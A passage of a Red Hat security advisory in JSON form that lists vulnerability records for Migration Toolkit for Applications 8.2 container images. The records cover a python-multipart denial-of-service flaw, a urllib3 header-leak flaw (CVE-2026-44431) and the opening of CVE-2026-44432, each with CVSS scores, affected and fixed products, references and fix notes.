"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "python-multipart: python-multipart: Denial of Service via excessive multipart part headers"
},
{
"cve": "CVE-2026-44431",
"cwe": {
"id": "CWE-201",
"name": "Insertion of Sensitive Information Into Sent Data"
},
"discovery_date": "2026-05-13T17:01:41.663622+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477167"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in urllib3, an HTTP client library for Python. When using the low-level API via `ProxyManager.connection_from_url().urlopen()` with `assert_same_host=False`, cross-origin redirects can still forward sensitive headers. This could allow a remote attacker to gain unauthorized access to sensitive information.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "urllib3: urllib3: Information disclosure via cross-origin redirects forwarding sensitive headers",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64"
],
"known_not_affected": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-44431"
},
{
"category": "external",
"summary": "RHBZ#2477167",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477167"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-44431",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-44431"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-44431",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44431"
},
{
"category": "external",
"summary": "https://github.com/urllib3/urllib3/security/advisories/GHSA-qccp-gfcp-xxvc",
"url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-qccp-gfcp-xxvc"
}
],
"release_date": "2026-05-13T15:20:24.588000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-21T22:10:10+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:43038"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "urllib3: urllib3: Information disclosure via cross-origin redirects forwarding sensitive headers"
},
{
"cve": "CVE-2026-44432",
"cwe": {
"id": "CWE-409",
"name": "Improper Handling of Highly Compressed Data (Data Amplification)"
},
"discovery_date": "2026-05-13T17:01:01.083841+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
